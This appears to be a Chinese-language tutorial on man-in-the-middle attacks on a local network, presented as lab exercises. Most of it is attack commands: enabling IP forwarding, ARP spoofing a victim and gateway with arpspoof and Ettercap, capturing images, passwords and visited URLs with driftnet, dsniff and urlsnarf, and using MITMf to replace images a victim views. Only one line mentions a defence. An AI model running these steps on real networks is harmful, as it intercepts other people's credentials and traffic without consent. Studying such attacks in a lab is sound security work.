中间人攻击

ARP欺骗(投毒、毒化)


攻击者:192.168.1.110

被欺骗主机:192.168.1.109

默认网关:192.168.1.1


1.启用IP转发(Linux主机的路由功能)

1
2
3
cat /proc/sys/net/ipv4/ip_forward /查看值
echo 1 >> /proc/sys/net/ipv4/ip_forward /修改
cat /proc/sys/net/ipv4/ip_forward /检查

2.投毒

1
2
arpspoof -i eth0 -t 192.168.1.109 192.168.1.1
arpspoof -i eth0 -t 192.168.1.1 192.168.1.110

3.测试数据包捕获

攻击者:driftnet -i eth0
受害者:搜索图片
攻击者查看能不能捕获到受害者搜索的内容

4.Ettercap进行ARP欺骗

重要插件:

dns_spoof (执行DNS欺骗攻击)
Dos_attack(对受害主机进行拒绝服务攻击)
Chk_poison(检测是否成功进行了攻击)
Repoison_arp(顾名思义,修复ARP)

参数:

-t 只监听这种协议
-T ettercap检查pcap文件(脱机监听)
-q 安静(不回显)
-M 这是一个重要的参数,他会告诉ettercap执行中间人攻击,使用这个参数很简单,如 -M method

栗子:

1
2
3
ettercap -T -q -M ARP  //对所有主机进行ARP欺骗
ettercap -T -q -M ARP 192.168.1.109 //欺骗单一主机
driftnet -i eth0 //开始监听

Dsniff&ARP欺骗攻击

1.转发IP并投毒

1
2
3
echo 1 >> /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.109 192.168.1.1
arpspoof -i eth0 -t 192.168.1.1 192.168.1.110

2.攻击者监听

1
2
3
dsniff -i eth0 //捕获登陆密码
urlsnarf -i eth0 //捕获受害者访问网站的详细信息
killall arpspoof //结束攻击

防御:绑定ARP和MAC


MITMF中间人攻击(项目地址)

这是一款中间人攻击框架,安装和介绍以及使用项目里已经说的很清楚了,就不赘述了。

实验:狸猫换太子(替换受害者浏览的图片)

一、把要替换的图片放到 /root/img

二、

1
python mitmf.py -i 攻击者网卡 --spoof --arp --gateway 网关 --targets 受攻击者ip --imgrand --img-dir /root/img